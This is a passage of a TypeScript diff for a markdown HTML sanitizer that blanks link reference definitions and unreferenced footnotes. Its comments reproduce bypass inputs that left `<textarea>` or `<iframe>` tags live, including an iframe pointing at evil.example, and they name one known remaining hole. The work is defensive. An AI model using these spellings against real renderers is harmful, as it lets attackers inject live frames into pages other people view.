+ * the full-line anchor `[ \t]*\r?$` then failed, and the line stayed VISIBLE
1414
+ * while remark still consumed the definition and emitted NOTHING — five live
1415
+ * spellings, each `escapeUnknownHtmlTags(md) === md` with one live
1416
+ * `<textarea>`:
1417
+ *
1418
+ * [a]: /x "a\"</textarea>" [a]: /x 'it\'s </textarea>'
1419
+ * [a]: /x (a\)</textarea>) [a\]b]: /x "</textarea>"
1420
+ * [a\]b]: </textarea>
1421
+ *
1422
+ * …while the unescaped CONTROL `[a]: /x "</textarea>"` blanked correctly, which
1423
+ * is what makes the escape (not the shape) the cause.
1424
+ *
1425
+ * AND THE LABEL AND TITLE MAY SPAN LINES. The old `'none' | 'needDest' |
1426
+ * 'needTitle'` state modelled continuation only AFTER the `]:`, so a LABEL that
1427
+ * opens on one line and closes on a later one, and a TITLE that opens
1428
+ * unterminated, were examined by NOBODY — `blankBracketLabels` deliberately
1429
+ * excludes a bare `[…]`, so the label had no other pass either. Live in both
1430
+ * renderers, byte-identical no-ops:
1431
+ *
1432
+ * [foo\n</textarea>]: /x [</textarea>\nfoo]: /x
1433
+ * [foo\n</textarea>\nbar]: /x > [foo\n> </textarea>]: /x
1434
+ * [a]: /x "line1\n</textarea>"
1435
+ *
1436
+ * …plus the escalation: a live `<iframe src=… width=… height=…>` behind
1437
+ * `[foo\n</iframe>]: /x`.
1438
+ *
1439
+ * THE PASS IS THEREFORE A CHARACTER PARSER, NOT A LINE REGEX. It is
1440
+ * ESCAPE-AWARE by construction (`skipEscaped` consumes `\` + one character
1441
+ * everywhere), has no length cap at all, and is LINEAR: every scan helper below
1442
+ * advances its cursor monotonically over one line, and the outer line loop
1443
+ * telescopes (see `findLabelClose`'s `stoppedAt` contract). No nested
1444
+ * quantifier survives, so the backtracking risk the counted caps used to
1445
+ * pretend to bound is gone rather than re-bounded. MEASURED, not assumed —
1446
+ * `__buildCloserHaystackForTest`, median of 7, at 37/151/389/989 KB, before →
1447
+ * after: list-dense 3.1/7.9/20.6/47.8 → 2.8/7.5/19.1/54.8 ms; realistic
1448
+ * 1.9/5.8/15.4/43.9 → 1.6/5.8/16.3/49.9 ms; definition-dense 1.3/5.5/15.0/40.0
1449
+ * → 1.4/5.9/17.8/45.2 ms. Every series stays DEAD LINEAR (2.5x input ⇒ ~2.7x
1450
+ * time) and the ~13-15% constant is the price of a character parser over a
1451
+ * regex. The ESCAPED-definition corpus is the outlier at 25.1 → 51.2 ms,
1452
+ * because HEAD did NO WORK on it: the backslash-blind regex failed to match and
1453
+ * left the line visible, which is precisely the defect. Adversarial shapes
1454
+ * (`[` + 40 backslash pairs per line, an all-unclosed-label document) are the
1455
+ * FASTEST corpora measured — 9.5 ms and 14.3 ms at 989 KB — because
1456
+ * `findLabelClose`'s `stoppedAt` contract makes the outer loop telescope
1457
+ * instead of rescanning the paragraph once per line. Do not remove `stoppedAt`;
1458
+ * a naive per-line lookahead is quadratic on exactly those inputs.
1459
+ *
1460
+ * EXIT DISCIPLINE — the structural point of this round. The parse has exactly
1461
+ * two stages, and the stage decides the fail direction:
1462
+ *
1463
+ * RECOGNITION (is this a definition at all?) may DECLINE. Every decline here
1464
+ * is a shape CommonMark also refuses, so remark emits the text as HTML and a
1465
+ * closer written in it is REAL — the same argument that keeps an inline
1466
+ * link's `[…]` and a bare shortcut reference visible. Declining is the
1467
+ * CORRECT answer, not a gap; the reachability argument for each is on the
1468
+ * exit itself.
1469
+ *
1470
+ * CONSUMPTION (a `[…]:` was recognized) may NEVER decline. Every give-up
1471
+ * routes through `blankLinesToParagraphBound` — the ONE give-up channel —
1472
+ * which blanks to the next blank line, CommonMark's own bound for a
1473
+ * definition, exactly as `blankInlineLinkPayloads` widens a capped payload to
1474
+ * `paragraphEnd`. A `decline` returned by the tail parser is a RECOGNITION
1475
+ * verdict delivered late (the line is not definition-shaped after all), and
1476
+ * it therefore unwinds the WHOLE construct — nothing is blanked — rather than
1477
+ * leaving a half-blanked span behind.
1478
+ */
1479
+
1480
+ /** `\` consumes the next character. THE escape primitive for this pass — every
1481
+ * scan below advances through it, which is what makes them all backslash-aware
1482
+ * and all monotonic. */
1483
+ function skipEscaped(s: string, i: number): number {
1484
+ return s[i] === '\\' ? i + 2 : i + 1
1485
+ }
1486
+
1487
+ /** First UNESCAPED occurrence of `ch` in `s` at or after `at`, else -1. */
1488
+ function findUnescaped(s: string, at: number, ch: string): number {
1489
+ for (let i = at; i < s.length; i = skipEscaped(s, i)) if (s[i] === ch) return i
1490
+ return -1
1491
+ }
1492
+
1493
+ const isSpaceTab = (ch: string): boolean => ch === ' ' || ch === '\t'
1494
+
1495
+ function skipSpaces(s: string, i: number): number {
1496
+ while (i < s.length && isSpaceTab(s[i])) i++
1497
+ return i
1498
+ }
1499
+
1500
+ /** Lines are `\n`-split, so a CRLF document leaves a trailing `\r`. The pass
1501
+ * blanks WHOLE lines, so dropping it costs no offset accuracy. */
1502
+ const stripCr = (s: string): string => (s.endsWith('\r') ? s.slice(0, -1) : s)
1503
+
1504
+ const TITLE_CLOSE: Record<string, string> = { '"': '"', "'": "'", '(': ')' }
1505
+
1506
+ /** Index just past a title whose opening delimiter is at `i`, or -1 when the
1507
+ * title does not close on this line. CommonMark ALLOWS a title to span lines,
1508
+ * so -1 is a CONTINUATION signal, never a decline. */
1509
+ function parseTitleOnLine(s: string, i: number): number {
1510
+ const close = TITLE_CLOSE[s[i]]
1511
+ for (let q = i + 1; q < s.length; q = skipEscaped(s, q)) if (s[q] === close) return q + 1
1512
+ return -1
1513
+ }
1514
+
1515
+ /** Index just past a destination at `i`, or -1.
1516
+ *
1517
+ * RECOGNITION DECLINE (-1), reachability: only an angle destination that never
1518
+ * closes on its line. CommonMark forbids a line ending inside `<…>` and a bare
1519
+ * destination may not START with `<`, so such a line is not a definition to
1520
+ * remark either — it is emitted as paragraph text and any closer in it is
1521
+ * REAL. Blanking it would over-escape a genuine element. */
1522
+ function parseDestOnLine(s: string, i: number): number {
1523
+ if (s[i] === '<') {
1524
+ for (let q = i + 1; q < s.length; q = skipEscaped(s, q)) if (s[q] === '>') return q + 1
1525
+ return -1
1526
+ }
1527
+ let q = i
1528
+ while (q < s.length && !isSpaceTab(s[q])) q = skipEscaped(s, q)
1529
+ return q > i ? Math.min(q, s.length) : -1
1530
+ }
1531
+
1532
+ /** What the remainder of ONE line says about the definition being consumed. */
1533
+ type DefTail =
1534
+ | { k: 'done' } // destination (+ optional title) complete; line ends
1535
+ | { k: 'needDest' } // nothing on this line; the destination follows
1536
+ | { k: 'needTitle' } // destination taken; a title MAY follow on a later line
1537
+ | { k: 'openTitle'; close: string } // a title opened here and did not close
1538
+ | { k: 'decline' } // not definition-shaped after all (see below)
1539
+
1540
+ /**
1541
+ * RECOGNITION DECLINE, reachability, for every `decline` this returns:
1542
+ *
1543
+ * - trailing content after a COMPLETE destination (+ title): CommonMark reads
1544
+ * a definition only when nothing but whitespace follows, so `[a]: /x junk
1545
+ * </textarea>` is a PARAGRAPH to remark and its closer is REAL;
1546
+ * - a title that is not space-separated from the destination (`[a]: <x>"t"`) —
1547
+ * same, remark reads no title and the trailing text invalidates the line.
1548
+ * The ANGLE spelling is the reachable one (round 22): `parseDestOnLine`
1549
+ * consumes a BARE destination to the next space/tab, so in `[a]: /x"t"` the
1550
+ * quote is part of the destination and the line returns `needTitle`, never
1551
+ * this decline;
1552
+ * - a non-delimiter where a title must begin — same;
1553
+ * - an unclosed angle destination — see `parseDestOnLine`.
1554
+ *
1555
+ * In every case remark EMITS the text, so leaving it visible is required, not
1556
+ * merely permitted. This is the same boundary `blankBracketLabels` draws
1557
+ * around an inline link's `[…]`.
1558
+ */
1559
+ function parseDefTail(c: string, at: number): DefTail {
1560
+ let q = skipSpaces(c, at)
1561
+ if (q >= c.length) return { k: 'needDest' }
1562
+ const destEnd = parseDestOnLine(c, q)
1563
+ if (destEnd < 0) return { k: 'decline' }
1564
+ q = destEnd
1565
+ const gap = skipSpaces(c, q)
1566
+ if (gap >= c.length) return { k: 'needTitle' }
1567
+ if (gap === q) return { k: 'decline' }
1568
+ return parseTitleTail(c, gap)
1569
+ }
1570
+
1571
+ /** The title half of `parseDefTail`, also used for a BARE title continuation
1572
+ * line. Same decline reachability. */
1573
+ function parseTitleTail(c: string, q: number): DefTail {
1574
+ const close = TITLE_CLOSE[c[q]]
1575
+ if (!close) return { k: 'decline' }
1576
+ const end = parseTitleOnLine(c, q)
1577
+ if (end < 0) return { k: 'openTitle', close }
1578
+ return skipSpaces(c, end) >= c.length ? { k: 'done' } : { k: 'decline' }
1579
+ }
1580
+
1581
+ /**
1582
+ * A definition's CONTINUATION lines carry the blockquote run and indent but
1583
+ * never a list marker — a marker would open a new item, not continue the
1584
+ * definition. The `{0,16}` indent bound is the same unreachable-as-fail-open
1585
+ * cap argued for `LINK_DEF_CONTAINER_PREFIX`: past 16 columns the line is ≥ 4
1586
+ * columns beyond the enclosing content column, i.e. INDENTED CODE that
1587
+ * `blankIndentedCode` has already blanked.
1588
+ */
1589
+ const LINK_DEF_CONT_PREFIX_RE = / {0,3}(?:>[ \t]?)*[ \t]{0,16}/y
1590
+ /** `\[(?!\^)` — a GFM FOOTNOTE definition is NOT a link reference definition;
1591
+ * its content is block-parsed and may hold real HTML (round 19). */
1592
+ const LINK_DEF_OPEN_RE = new RegExp(`^${LINK_DEF_CONTAINER_PREFIX}\\[(?!\\^)`)
1593
+
1594
+ function contPrefixLen(c: string): number {
1595
+ LINK_DEF_CONT_PREFIX_RE.lastIndex = 0
1596
+ return LINK_DEF_CONT_PREFIX_RE.exec(c)![0].length
1597
+ }
1598
+
1599
+ /**
1600
+ * Walk forward for the `]:` that turns an opened label into a DEFINITION.
1601
+ * Crosses lines (a CommonMark label may), bounded by the next blank line.
1602
+ *
1603
+ * Returns `{ line, colon }` on success, or `{ stoppedAt }` — a RECOGNITION
1604
+ * decline whose reachability is:
1605
+ * - a `]` not followed by `:` → a bare shortcut reference or ordinary text,
1606
+ * which remark EMITS, so a closer inside it is real (the exclusion
1607
+ * `blankBracketLabels` already documents);
1608
+ * - an unescaped `[` inside the label → CommonMark rejects the label, so the
1609
+ * whole run is paragraph text;
1610
+ * - the paragraph bound with neither → an ordinary `[`-leading prose
1611
+ * paragraph, which must stay untouched.
1612
+ *
1613
+ * `stoppedAt` also makes the outer loop LINEAR. Nothing in `[i, stoppedAt)`
1614
+ * holds a `]` or `[`, so no line in that window can open a definition either;
1615
+ * the caller resumes at `max(stoppedAt, i + 1)` and the per-line work
1616
+ * telescopes instead of rescanning the paragraph once per line.
1617
+ */
1618
+ function findLabelClose(
1619
+ lines: MaskLine[],
1620
+ i: number,
1621
+ from: number,
1622
+ ): { line: number; colon: number } | { stoppedAt: number } {
1623
+ for (let j = i; j < lines.length; j++) {
1624
+ const c = stripCr(lines[j].content)
1625
+ if (j > i && isBlankLine(c)) return { stoppedAt: j }
1626
+ for (let q = j === i ? from : contPrefixLen(c); q < c.length; q = skipEscaped(c, q)) {
1627
+ if (c[q] === '[') return { stoppedAt: j }
1628
+ if (c[q] !== ']') continue
1629
+ return c[q + 1] === ':' ? { line: j, colon: q + 1 } : { stoppedAt: j }
1630
+ }
1631
+ }
1632
+ return { stoppedAt: lines.length }
1633
+ }
1634
+
1635
+ /**
1636
+ * Blank LINK REFERENCE DEFINITIONS (round 18 — SECURITY).
1637
+ *
1638
+ * `remark` consumes a definition ENTIRELY and emits no node for it, so a
1639
+ * `</textarea>` written in a definition's LABEL, DESTINATION or TITLE is never
1640
+ * a real closer — but it survived into the closer haystack, `hasLaterCloser`
1641
+ * returned true and a prose `<textarea>` above stayed LIVE. Reproduced
1642
+ * byte-identical for `[a]: /x "</textarea>"`, `[a]: </textarea>`, the
1643
+ * multi-line spellings (round 19), the backslash-escaped delimiters and the
1644
+ * multi-line label/title (round 21).
1645
+ *
1646
+ * FAIL DIRECTION: blank the WHOLE line on a definition-SHAPED match, without
1647
+ * modelling "a definition may not interrupt a paragraph". Over-blanking here can
1648
+ * only hide closers, i.e. escape MORE openers — the fail-CLOSED direction — so
1649
+ * the loose shape is the correct bias.
1650
+ *
1651
+ * FOOTNOTES ARE EXCLUDED (round 19). The label rejects a leading `^`: a GFM
1652
+ * footnote definition's content is BLOCK-parsed and may contain REAL html.
1653
+ *
1654
+ * CONTAINER-AGNOSTIC BY CONSTRUCTION, like `blankComments` — the shape absorbs
1655
+ * an optional blockquote run and one list marker, so a definition written inside
1656
+ * a quote or ON a list-marker line is covered by the SINGLE top-level call.
1657
+ */
1658
+ function blankLinkDefinitions(masked: string, lines: MaskLine[]): string {
1659
+ const ranges: Array<[number, number]> = []
1660
+ const blankLine = (line: MaskLine): void => {
1661
+ ranges.push([line.contentStart, line.contentStart + line.content.length])
1662
+ }
1663
+
1664
+ /**
1665
+ * THE ONE GIVE-UP CHANNEL. A construct already recognized as a definition can
1666
+ * only ever stop blanking at CommonMark's own bound for it — the next blank
1667
+ * line — never by declining. Returns the index of the last line blanked.
1668
+ * `stop` lets a caller end EARLY on a line it recognises (a closing title
1669
+ * delimiter); returning false everywhere degrades to "blank to the bound",
1670
+ * which is the default this channel exists to guarantee.
1671
+ */
1672
+ const blankLinesToParagraphBound = (from: number, stop: (c: string) => boolean): number => {
1673
+ let k = from
1674
+ for (; k < lines.length; k++) {
1675
+ const c = stripCr(lines[k].content)
1676
+ if (isBlankLine(c)) break
1677
+ blankLine(lines[k])
1678
+ if (stop(c)) {
1679
+ k++
1680
+ break
1681
+ }
1682
+ }
1683
+ return k - 1
1684
+ }
1685
+
1686
+ let i = 0
1687
+ while (i < lines.length) {
1688
+ const line = lines[i]
1689
+ if (line.content.indexOf('[') === -1) {
1690
+ i++
1691
+ continue
1692
+ }
1693
+ const open = LINK_DEF_OPEN_RE.exec(line.content)
1694
+ if (!open) {
1695
+ i++
1696
+ continue
1697
+ }
1698
+ const close = findLabelClose(lines, i, open[0].length)
1699
+ if ('stoppedAt' in close) {
1700
+ i = Math.max(close.stoppedAt, i + 1)
1701
+ continue
1702
+ }
1703
+ const head = stripCr(lines[close.line].content)
1704
+ let tail = parseDefTail(head, close.colon + 1)
1705
+ // A late RECOGNITION verdict unwinds the WHOLE construct: remark emits every
1706
+ // line of it as text, so nothing may be blanked.
1707
+ if (tail.k === 'decline') {
1708
+ i = Math.max(close.line, i + 1)
1709
+ continue
1710
+ }
1711
+ // COMMITTED. From here every exit blanks.
1712
+ for (let j = i; j <= close.line; j++) blankLine(lines[j])
1713
+ let j = close.line
1714
+ while (tail.k !== 'done') {
1715
+ if (tail.k === 'openTitle') {
1716
+ const closer = tail.close
1717
+ j = blankLinesToParagraphBound(j + 1, (c) => findUnescaped(c, 0, closer) !== -1)
1718
+ break
1719
+ }
1720
+ const k = j + 1
1721
+ if (k >= lines.length) break
1722
+ const c = stripCr(lines[k].content)
1723
+ if (isBlankLine(c)) break
1724
+ const at = contPrefixLen(c)
1725
+ const next: DefTail =
1726
+ tail.k === 'needDest' ? parseDefTail(c, at) : parseTitleTail(c, skipSpaces(c, at))
1727
+ // The definition is already COMPLETE without this line (a destination-only
1728
+ // definition needs no title; a `[a]:` with no parseable destination is not
1729
+ // a definition at all and remark emits the following line as text), so this
1730
+ // is a RECOGNITION boundary, not a give-up.
1731
+ if (next.k === 'decline') break
1732
+ blankLine(lines[k])
1733
+ j = k
1734
+ tail = next
1735
+ }
1736
+ i = j + 1
1737
+ }
1738
+ return blankRanges(masked, mergeRanges(ranges))
1739
+ }
1740
+
1741
+ /**
1742
+ * `[^` after the container prefix — a GFM FOOTNOTE definition opener, the shape
1743
+ * `LINK_DEF_OPEN_RE`'s `\[(?!\^)` deliberately refuses.
1744
+ *
1745
+ * The prefix absorbs a blockquote run and ANY NUMBER of list markers, where
1746
+ * `LINK_DEF_CONTAINER_PREFIX` stops at one. It has to: this pass is called ONCE
1747
+ * at top level (its reference set is document-global, so it cannot be re-run on
1748
+ * a container pass's stripped run the way `blankLinkDefinitions` is), and the
1749
+ * sweep found `- - [^zz]: … </textarea>` swallowing live at depth 2. Over-
1750
+ * detection is fail-CLOSED here — an unreferenced footnote is emitted by
1751
+ * nothing, so blanking more of one costs nothing at all.
1752
+ *
1753
+ * THE MARKER GROUP CARRIES NO LEADING WHITESPACE QUANTIFIER, deliberately. The
1754
+ * indent is matched ONCE before the group and afterwards only by each marker's
1755
+ * OWN trailing `[ \t]{1,16}`, so no two quantifiers ever compete for the same
1756
+ * whitespace run and a gap has exactly one viable split. The naive spelling
1757
+ * (`(?:[ \t]{0,16}marker[ \t]{1,16})*`) splits a 2-space gap two ways and
1758
+ * backtracks 2^depth on a NON-matching line — `- - - …x` is ordinary prose.
1759
+ */
1760
+ const FOOTNOTE_DEF_OPEN_RE = new RegExp(
1761
+ '^ {0,3}(?:>[ \\t]?)*[ \\t]{0,16}(?:(?:[-*+]|\\d{1,9}[.)])[ \\t]{1,16})*\\[\\^',
1762
+ )
1763
+ /** A blockquote run, WITHOUT swallowing the indent after it — the footnote-body
1764
+ * continuation test has to MEASURE that indent, which `contPrefixLen` eats. */
1765
+ const FOOTNOTE_QUOTE_PREFIX_RE = / {0,3}(?:>[ \t]?)*/y
1766
+
1767
+ /**
1768
+ * micromark's `normalizeIdentifier`, byte-for-byte: collapse every whitespace
1769
+ * run to one space, trim, then case-fold via `toLowerCase().toUpperCase()` (the
1770
+ * double fold is what makes ß/ẞ and the Turkish dotted I agree). A reference and
1771
+ * a definition are the SAME footnote exactly when these agree, so matching on
1772
+ * anything looser (raw slices) would call a resolved footnote unreferenced.
1773
+ */
1774
+ function normalizeFootnoteLabel(label: string): string {
1775
+ return label
1776
+ .replace(/[\t\n\r ]+/g, ' ')
1777
+ .replace(/^ | $/g, '')
1778
+ .toLowerCase()
1779
+ .toUpperCase()
1780
+ }
1781
+
1782
+ /** End index of the label opened by `[^` at `open`, i.e. the index of its
1783
+ * closing `]`, or -1. Escape-aware and single-line, like the construct. An
1784
+ * unescaped `[` inside voids the label exactly as it does for a link label. */
1785
+ function footnoteLabelEnd(c: string, open: number): number {
1786
+ for (let q = open + 2; q < c.length; q = skipEscaped(c, q)) {
1787
+ if (c[q] === '[') return -1
1788
+ if (c[q] === ']') return q
1789
+ }
1790
+ return -1
1791
+ }
1792
+
1793
+ /**
1794
+ * Blank UNREFERENCED GFM FOOTNOTE DEFINITIONS (round 22 — SECURITY).
1795
+ *
1796
+ * Round 19 excluded `[^label]:` from `blankLinkDefinitions` and wrote the
1797
+ * reason on the exit: a footnote's body is BLOCK-parsed and may hold REAL html,
1798
+ * so blanking it would hide a genuine closer and over-escape a genuine element.
1799
+ * That reason is true of a REFERENCED footnote and FALSE of an unreferenced one:
1800
+ * `remark-gfm` resolves definitions against references and DROPS a definition
1801
+ * nothing points at, emitting no node and no footnote section for it. Nothing in
1802
+ * its body reaches the document — but the whole line stayed live in the closer
1803
+ * haystack, `hasLaterCloser` returned true, and the prose opener above it was
1804
+ * left UNESCAPED. Reproduced end-to-end through the real
1805
+ * `escapeUnknownHtmlTags → remarkGfm → rehypeRaw → rehypeSanitize` chain:
1806
+ *
1807
+ * Secret prose.
1808
+ *
1809
+ * <iframe src="https://evil.example/x" width="600">
1810
+ *
1811
+ * visible text
1812
+ *
1813
+ * [^f]: note body </iframe>
1814
+ *
1815
+ * → `<p>Secret prose.</p><iframe src="https://evil.example/x" width="600">
1816
+ * visible text</iframe>` — a LIVE iframe keeping both attributes and swallowing
1817
+ * the prose below. Delete the footnote line and the same input escapes
1818
+ * correctly. The lesson the round generalises: a RECOGNITION decline's
1819
+ * justification must hold for EVERY sub-case of the construct, not the common
1820
+ * one.
1821
+ *
1822
+ * SO THE DECLINE IS NARROWED, NOT DROPPED. A definition whose label IS
1823
+ * referenced keeps round 19's treatment (untouched, body live). A definition
1824
+ * whose label is referenced NOWHERE is blanked with its body. That blanking is
1825
+ * EXACT for every reference the mask can see — remark emits NONE of those bytes
1826
+ * — and OVER-blanks only where an earlier pass has already hidden a REAL
1827
+ * reference, which is the fail-CLOSED direction. (Round 23 checked the claim in
1828
+ * the over-blank direction, where the older "EXACT, not merely fail-closed"
1829
+ * wording was false: `blankLinkDefinitions`' `openTitle` exit blanks to the
1830
+ * paragraph bound, but an unclosed title makes CommonMark REJECT the definition
1831
+ * and read the run as a PARAGRAPH, whose `[^f]` is a genuine reference. Executed:
1832
+ * `[a]: /x "unclosed` + a lazy line holding `[^f]` + `[^f]: body </textarea>`
1833
+ * escapes its opener even though remark renders the closer live. Cosmetic, and
1834
+ * on the safe side — but do not re-read the sentence as a proof that it cannot
1835
+ * happen.)
1836
+ *
1837
+ * THE PASS READS TWO SOURCES, and the split is the security-load-bearing part
1838
+ * (round 23 — this pass's own fail-open):
1839
+ *
1840
+ * DEFINITIONS come from the CURRENT MASK (`text`). A definition line hidden
1841
+ * by an earlier pass is simply not seen, which leaves it in the haystack —
1842
+ * round 19's behaviour, the direction this pass was already in.
1843
+ *
1844
+ * REFERENCES come from a SEPARATE, MORE-BLANKED scratch copy (`refText`,
1845
+ * built by `footnoteReferenceMask`). Round 22 counted them on the current
1846
+ * mask and justified it with "a `[^f]` written inside code has already been
1847
+ * blanked" plus "a phantom reference degrades to round 19's behaviour, never
1848
+ * worse". Both sentences are true of CODE and FALSE of every region remark
1849
+ * consumes into an ATTRIBUTE or drops entirely: at this point in the pipeline
1850
+ * `blankInlineLinkPayloads`, `blankBracketLabels` and `blankComments` have
1851
+ * not run yet, so a `[^f]` written in an image ALT, a full-reference LABEL,
1852
+ * an inline link TITLE or angle DESTINATION, an HTML COMMENT or a raw HTML
1853
+ * BLOCK counted as a live reference. remark resolves NONE of those — the
1854
+ * definition it points at is dropped and never becomes document text — so
1855
+ * the phantom kept the definition (and its `</textarea>`) in the closer
1856
+ * haystack, `hasLaterCloser` returned true and the opener above stayed LIVE.
1857
+ * That is a fail-OPEN, not a degradation: TEN spellings reproduced a live
1858
+ * `<textarea>` (or, with an attribute-bearing `<iframe>` opener, a live
1859
+ * iframe) end-to-end. Verified phantom-ness independently —
1860
+ * `visible text ![x [^f] y](/i.png)` + `[^f]: body` emits NO `data-footnotes`
1861
+ * section at all, while the same input with a real reference does.
1862
+ *
1863
+ * The scratch copy may over-blank freely: counting FEWER references only
1864
+ * blanks MORE definitions, which is the fail-CLOSED direction.
1865
+ *
1866
+ * CONTAINER-NESTED CODE IS NOT A HOLE — round 22's hedge ("a reference inside
1867
+ * such a region still counts, because the container passes run AFTER this one")
1868
+ * was over-pessimistic and is retracted. MEASURED, with a type-6 opener so the
1869
+ * shape is not confounded by the opener's own HTML block: a `[^f]` inside a
1870
+ * blockquoted fence, a list-item fence at content column 2 AND at 4, a
1871
+ * quoted-list fence, a top-level fence and indented code all render 0 live
1872
+ * elements — every one of those regions is ALREADY blanked by
1873
+ * `blankFencedRegions` / `blankIndentedCode` before this pass reads the mask.
1874
+ *
1875
+ * THE ONE NAMED RESIDUAL is TRANSITIVE: a reference that exists ONLY inside
1876
+ * ANOTHER, itself-unreferenced, definition's body (`[^a]: see [^f]` with nothing
1877
+ * referencing `a`). remark drops both definitions, so `[^f]`'s is a phantom too,
1878
+ * but this pass counts references ONCE and would need a FIXPOINT (blank, rebuild
1879
+ * the ref-mask, recount) to see it. Deliberately not built: the loop is
1880
+ * unbounded in the number of definitions, and the shape needs an attacker to
1881
+ * plant a second dead definition. Reproduced and left standing knowingly — if it
1882
+ * is ever closed, close it with a bounded iteration count, not an unbounded one.
1883
+ *
1884
+ * BODY BOUND: the label line, its LAZY paragraph continuation lines, and any
1885
+ * further blocks indented >= 4 columns past the blockquote run — GFM's own
1886
+ * "content of a footnote is what an indented continuation would give a list
1887
+ * item". The walk stops at a de-indented line after a blank one, and at another
1888
+ * footnote-definition line, so a following REFERENCED footnote is not
1889
+ * over-blanked into escaped source.
1890
+ *
1891
+ * CONTAINER-AGNOSTIC BY CONSTRUCTION, and MORE so than `blankLinkDefinitions`:
1892
+ * the reference set is document-GLOBAL, so unlike that pass this one cannot be
1893
+ * re-run on a container pass's stripped run to reach deeper nesting. Its opener
1894
+ * prefix therefore absorbs any number of list markers itself (see
1895
+ * `FOOTNOTE_DEF_OPEN_RE`), and the single top-level call covers every depth.
1896
+ */
1897
+ function blankUnreferencedFootnotes(masked: string, lines: MaskLine[], folded: string): string {
1898
+ // `[^` is rare and the whole pass is a no-op without one, so one native scan
1899
+ // buys the overwhelming majority of documents a total skip. This pass runs
1900
+ // over EVERY line of the document; without the guard and the `indexOf` walk
1901
+ // below it would be the most expensive one in the mask, for a construct
1902
+ // almost nothing contains (measured: no regression at 989 KB on a corpus with
1903
+ // no footnotes at all).
1904
+ if (masked.indexOf('[^') === -1) return masked
1905
+ // The MASK's text for a line, sliced on demand. `remapToMask` would allocate a
1906
+ // second object per line of the whole document for a pass that usually touches
1907
+ // one of them.
1908
+ const text = (line: MaskLine): string =>
1909
+ stripCr(masked.slice(line.contentStart, line.contentStart + line.content.length))
1910
+ // …and the REFERENCE-ONLY copy, blanked further (see `footnoteReferenceMask`).
1911
+ // Built ONLY past the `[^` guard, so a document without footnotes pays nothing.
1912
+ // Length-preserving like every other mask, so an index means the same byte in
1913
+ // both copies.
1914
+ const refMask = footnoteReferenceMask(masked, folded)
1915
+ const refText = (line: MaskLine): string =>
1916
+ stripCr(refMask.slice(line.contentStart, line.contentStart + line.content.length))
1917
+
1918
+ // PASS 1 — the DEFINITION on each line (from the mask) and every `[^label]`
1919
+ // that is a REFERENCE (from the ref-mask). A group is a DEFINITION only where
1920
+ // the line-anchored opener shape puts it AND a `:` follows; every other
1921
+ // `[^…]`, including a mid-line `see [^f]: here`, is a reference to remark.
1922
+ // Occurrences are reached with `indexOf`, never a per-character walk: the pass
1923
+ // runs over EVERY line of the document and a char walk would make it the most
1924
+ // expensive one in the mask for a construct almost no line contains.
1925
+ const referenced = new Set<string>()
1926
+ const defAt: Array<number | null> = []
1927
+ for (const line of lines) {
1928
+ const c = text(line)
1929
+ let isDef: number | null = null
1930
+ if (c.indexOf('[^') !== -1) {
1931
+ const open = FOOTNOTE_DEF_OPEN_RE.exec(c)
1932
+ if (open !== null) {
1933
+ // The opener is line-anchored past a whitespace/marker prefix, so its
1934
+ // `[` can never carry a backslash escape — the prefix would not match.
1935
+ const defOpen = open[0].length - 2
1936
+ const end = footnoteLabelEnd(c, defOpen)
1937
+ if (end !== -1 && c[end + 1] === ':') isDef = defOpen
1938
+ }
1939
+ }
1940
+ defAt.push(isDef)
1941
+ const rc = refText(line)
1942
+ for (let q = rc.indexOf('[^'); q !== -1; q = rc.indexOf('[^', q)) {
1943
+ // Escape-aware without the walk: an ODD run of backslashes before the `[`
1944
+ // escapes it, an EVEN one is escaped backslashes and leaves `[` live.
1945
+ let back = q
1946
+ while (back > 0 && rc[back - 1] === '\\') back--
1947
+ if ((q - back) % 2 === 1) {
1948
+ q += 2
1949
+ continue
1950
+ }
1951
+ const end = footnoteLabelEnd(rc, q)
1952
+ if (end === -1) break
1953
+ if (q !== isDef) referenced.add(normalizeFootnoteLabel(rc.slice(q + 2, end)))
1954
+ q = end + 1
1955
+ }
1956
+ }
1957
+
1958
+ // PASS 2 — blank each definition whose label nothing references, body included.
1959
+ // Slices the REAL mask, never the ref-mask.
1960
+ const ranges: Array<[number, number]> = []
1961
+ for (let i = 0; i < lines.length; i++) {
1962
+ const at = defAt[i]
1963
+ if (at === null) continue
1964
+ const head = text(lines[i])
1965
+ const end = footnoteLabelEnd(head, at)
1966
+ if (referenced.has(normalizeFootnoteLabel(head.slice(at + 2, end)))) continue
1967
+ let j = i
1968
+ let sawBlank = false
1969
+ for (let k = i + 1; k < lines.length; k++) {
1970
+ const c = text(lines[k])
1971
+ if (isBlankLine(c)) {
1972
+ sawBlank = true
1973
+ continue
1974
+ }
1975
+ // A second definition ends this one; over-blanking a REFERENCED
1976
+ // neighbour's body would show it as escaped source (cosmetic, but avoidable).
1977
+ if (defAt[k] !== null) break
1978
+ // After a blank line only an INDENTED block continues the footnote; before
1979
+ // one, any non-blank line is a lazy paragraph continuation.
1980
+ if (sawBlank && footnoteIndentCols(c) < 4) break
1981
+ j = k
1982
+ }
1983
+ for (let k = i; k <= j; k++) {
1984
+ const line = lines[k]
1985
+ ranges.push([line.contentStart, line.contentStart + line.content.length])
1986
+ }
1987
+ }
1988
+ return blankRanges(masked, mergeRanges(ranges))
1989
+ }
1990
+
1991
+ /**
1992
+ * The REFERENCE-COUNTING copy of the mask for `blankUnreferencedFootnotes`
1993
+ * (round 23 — SECURITY, that pass's own fail-open).
1994
+ *
1995
+ * A `[^f]` only makes a definition REFERENCED if remark resolves it as a
1996
+ * reference. Everything remark consumes into an ATTRIBUTE or drops outright is
1997
+ * a PHANTOM, and at this point in the pipeline none of those regions are masked
1998
+ * yet, so this copy applies the four passes that hide them:
1999
+ *
2000
+ * `blankInlineLinkPayloads` — an inline link/image DESTINATION or TITLE
2001
+ * (`[a](/x "[^f]")`, `[a](<[^f]>)`, `![a](/x '[^f]')`) becomes href/title.
2002
+ * `blankBracketLabels`, WITHOUT its footnote-label ranges — an image ALT
2003
+ * (`![[^f]](/i.png)`) and a full-reference LABEL (`[txt][[^f]]`) become an
2004
+ * attribute or an identifier. The `[^…]` ranges MUST be excluded: that pass
2005
+ * blanks a footnote label "reference AND definition alike", which here
2006
+ * would erase EVERY real reference and over-blank every referenced
2007
+ * definition into escaped source.
2008
+ * HTML BLOCK ranges — inside a `<div>` … block the line `[^f]` is raw HTML
2009
+ * content, not a reference. Reuses `computeHtmlBlockRanges`, the module's
2010
+ * own CommonMark block model, so this copy cannot disagree with the carve.
2011
+ * `blankComments` — `<!-- [^f] -->` is dropped entirely. LAST, as everywhere
2012
